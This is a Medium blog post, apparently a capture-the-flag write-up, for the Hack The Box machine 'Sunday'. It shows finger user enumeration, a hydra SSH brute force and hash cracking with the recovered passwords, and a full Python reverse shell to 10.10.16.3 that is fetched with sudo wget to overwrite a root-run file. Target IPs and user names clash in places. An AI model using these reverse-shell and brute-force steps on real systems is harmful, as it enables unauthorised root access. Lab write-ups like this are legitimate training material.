Open in app

Sign in

Write

Sign in

SUNDAY

Burak Dirlik
4 min readJul 2, 2024

Target ip is 10.129.32.188 Lets start.


nmap -sC -sV -O -T4 -oN nmap.txt 10.129.32.188

Lets make more comprehensive scan for found ports, but nothing changed.

nmap -p 79,111,515 -sV -oA full-scripts 10.129.32.188

Port 79 is running finger service.

Firstly, we check if there are any logged in users.

I look at pentestmonkey if there is something related to finger service.

There is user enumeration tool named finger-user-enum.

Usage:

./finger-user-enum.pl -U /home/kali/Downloads/Seclist-master/Usernames/Names/names.txt -t 10.129.32.168

Now we can compare the results of finger for a name that exists and one that doesn’t:

Since we have no indication of a password, we can try brute-force to SSH with the following command:

hydra -V -I -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.129.32.188 ssh -s 22022

We got some credentials end of the brute force.

sunny:sunday

SSH connection:

ssh -p 22022 sunny@10.129.32.188

I can not see user.txt we need to privilege escalation.

But I can see /etc/passwd There are some hashes for sammy and sunny.

We need to crack these hashes to see passwords. I am using hashcat.

We got passwords

sammy:cooldude!
sunny:sunday

I can see user.txt with sammy user now.

Lets see which commands we can run as root.”

We observe the following results from the sudo -l command:

  • The user Sunny has permission to execute the /root/troll file with root privileges.
  • The user Sammy can overwrite any file owned by root using the wget command.

To exploit this, we’ll leverage Sammy’s sudo privileges to overwrite the /root/troll file and insert a shell into it. Then, using Sunny's sudo privileges, we'll execute the /root/troll file to escalate our shell to a root shell.

Target IP: 10.10.10.76
Attacker IP: 10.10.16.3 --> we added to shell.py

shell.py:

#!/usr/bin/python

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.3", 444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p=subprocess.call(["/bin/sh", "-i"])

Executed command at Sammy user: (it overwrite /root/troll as shell.py)

sudo wget http://10.10.16.3:4444/shell.py -O /root/troll

Sammy user:

sudo /root/troll

We have to run these commands one after the other. Because the /root/troll file is resetted to original itself every 5 seconds. Therefore, we should be fast to obtain the shell. After that shell dropped to netcat as a root user and we got root flag.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Burak Dirlik
Burak Dirlik

Written by Burak Dirlik

15 Followers
85 Following

Computer Engineer & Penetration Tester

No responses yet

Write a response

What are your thoughts?

More from Burak Dirlik

See all from Burak Dirlik

Recommended from Medium

See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech